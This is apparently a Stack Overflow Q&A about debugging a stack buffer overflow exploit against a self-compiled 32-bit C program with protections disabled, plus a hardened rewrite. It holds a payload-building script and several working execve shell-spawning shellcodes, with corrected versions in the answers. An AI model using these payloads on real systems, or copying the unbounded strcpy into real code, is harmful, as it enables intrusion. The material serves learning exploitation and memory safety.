-1

I'm executing a 32-bit program (my arch is 64-bit).

Vulnerable code:

#include <string.h>
#include <stdio.h>

int copier(char *str);   /* prototype so the call in main compiles cleanly */

int main(int argc, char *argv[]) {
    copier(argv[1]);
    printf("Done!\n");
    return 0;
}

int copier(char *str) {
    char buffer[100];
    strcpy(buffer, str);   /* deliberately unbounded copy: this is the overflow */
    return 0;
}


Exploit:

#!/usr/bin/python3

ret = b"\xb0\xcd\xff\xff"
shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

# NOP sled, shellcode, padding up to the saved return address, then the new return address
payload = b"\x90"*40 + shellcode + b"A"*(112 - 40 - len(shellcode)) + ret

with open("bo1.payload", "wb") as f:
    f.write(payload)


But when exploiting, it doesn't work. When executed outside the debugger there is a Segmentation fault error.
[screenshot: before int 0x80]
[screenshot: just after int 0x80]
Q1 I think this is because the execve replaced the previous code. Is that right?
So I pressed 'q' and used the command 'dc' to continue.

[0xf7dd7c30]> dc
Selecting and continuing: 16145
child stopped with signal 17
[+] SIGNAL 17 errno=0 addr=0x3e80000546d code=1 ret=0
got signal...
[+] signal 17 aka SIGCHLD received 0

[3]+  Arrêté                r2 -d ./bo1 $(cat bo1.payload)


Q2 Why 'child stopped with signal 17' and no shell prompt after int 0x80?

Edit:
ASLR: sysctl -w kernel.randomize_va_space=0
compiled with 'gcc -g -fno-stack-protector -z execstack -m32 -o bo1 bo1.c'

Edit2:
Apparently the problem is in the shellcodes. I tried all of these; only the last one works and spawns the shell.

shellcode = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
             b"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
             b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

shellcode = (b"\x31\xc0\xb0\x01\x31\xdb\xcd\x80")

shellcode = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\x8d\x1e\x8d\x4e"
             b"\x0a\x8d\x56\x0e\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
             b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

shellcode = (b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
             b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
             b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")
Tosi Do
  • 113
  • 1
  • 4
  • Presumably whatever system call you attempted failed, and your code doesn't handle that. This is not an [MCVE], it's hard to tell anything more from this much information. – Jester Jun 29 '17 at 14:42
  • What OS are you using? Operating system's anti exploit mitigation technology might have stopped it too. For example security cookie etc – Asesh Jun 30 '17 at 08:06
  • @Asesh : I'm on GNU/Linux 4.11.
    randomize_va_space=0.
    compiled with 'gcc -g -fno-stack-protector -z execstack -m32 -o bo1 bo1.c'
    – Tosi Do Jun 30 '17 at 09:00
  • I thought that it's the problem described in [https://stackoverflow.com/questions/2859127/shellcode-for-a-simple-stack-overflow-exploited-program-with-shell-terminates-d?rq=1], then I tried Aralox's shellcode but no effect, **signal 17** – Tosi Do Jun 30 '17 at 09:12
  • Consider disabling ASLR. – Thiner Jun 30 '17 at 09:27
  • @Thiner : it is. – Tosi Do Jun 30 '17 at 09:42

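For readers following the question from the defensive side, here is the same copier routine written so the overflow the question relies on cannot happen. This is an added example, not code from the question or the answers: the names copier_bounded and copier_checked, the BUF_SIZE constant and the return-value convention are my own assumptions; only the buffer size of 100 comes from the original program.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 100   /* same size as the original buffer[100] */

/* Hardened copy (assumed helper, not from the page): copies src into dst only if it
 * fits together with its terminating NUL. Returns 0 on success, -1 on refusal.
 * Refusing is preferred over silent truncation so callers can see the oversized input. */
int copier_bounded(char *dst, size_t dstsize, const char *src) {
    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dstsize)              /* would overflow: do not touch dst at all */
        return -1;
    memcpy(dst, src, n + 1);       /* n bytes plus the NUL */
    return 0;
}

/* Counterpart of the original copier(): local buffer of 100 bytes, but the copy
 * is bounded. Returns the number of bytes copied, or -1 if the input was rejected. */
int copier_checked(const char *str) {
    char buffer[BUF_SIZE];
    if (copier_bounded(buffer, sizeof buffer, str) != 0) {
        fprintf(stderr, "input too long (%zu bytes, max %zu)\n",
                str ? strlen(str) : 0, sizeof buffer - 1);
        return -1;
    }
    return (int)strlen(buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    if (copier_checked(argv[1]) < 0)
        return 1;
    printf("Done!\n");
    return 0;
}
```

With this version a 112-byte or longer argument (the size of the question's payload) is rejected before any stack memory past buffer is written, so the saved return address is never reachable. Building it without the question's `-fno-stack-protector -z execstack` flags additionally restores gcc's default stack canary and a non-executable stack, two independent layers that would each have stopped the posted exploit even if the copy had stayed unbounded.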
2 Answers

2

The reason itself is easy enough to explain: the push instructions in the shellcode erased the ending bytes of the shellcode (notice that eip is on the stack and very near esp, right?). Prefixing the shellcode with "add esp, 0x70" is enough most of the time.

However, I think you need to learn how to debug the program before asking questions. Use gdb, learn some assembly, and learn how shellcode works, so that you can know how it does not work.

For example, shellcode1 ends with \xcd\x80, which is int 0x80. But when you debug it, the final int 0x80 disappears before the final execve call completes. That is strange, therefore one needs to consider what modified the shellcode.

Thiner
  • 345
  • 1
  • 9
  • shellcode1 dies because of this, shellcode2 dies because execve(filename, argv, envp) envp is not a valid pointer array or NULL. shellcode3 does not pop a shell, it is just exit(0) – Thiner Jun 30 '17 at 12:49
  • thank you for this: _However, I think you need to learn how to debug the program before asking questions. Use gdb, learn some assembly, and learn how shellcode works, so that you can know how it does not work._ Apparently I did not find how the shellcodes did not work. – Tosi Do Jun 30 '17 at 17:10
0

### 'add esp, 70' at the beginning. Bad byte '0x27': I replaced it with '0x26' and incremented 'ch'
shellcode1 = (b"\x83\xc4\x70\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
             b"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x26\xfe\xc5\xb0\x05\xcd\x80"
             b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

### Correct edx so it references NULL
shellcode2 = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\x8d\x54\x24\x04\xb0\x0b\xcd\x80")

### I could not see it exiting due to the difference in stack frame offset between r2 and the bash shell
shellcode3 = (b"\x31\xc0\xb0\x01\x31\xdb\xcd\x80")

### Containing a bad byte '\x0a'
shellcode4 = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\x8d\x1e\x8d\x4e"
             b"\x0a\x8d\x56\x0e\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
             b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

### Spawn /bin/sh instead of /bin/bash
shellcode5 = (b"\xeb\x1d\x5e\x8d\x46\x03\x31\xdb\x88\x5e\x07\x89\x70\x05\x89\x5e\x0c\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

### The correct one
shellcode6 = (b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
             b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
             b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")
Tosi Do
  • 113
  • 1
  • 4
  • Could you please describe what difference the correct one / last one contains compared to the others? – xuiqzy Oct 26 '21 at 15:18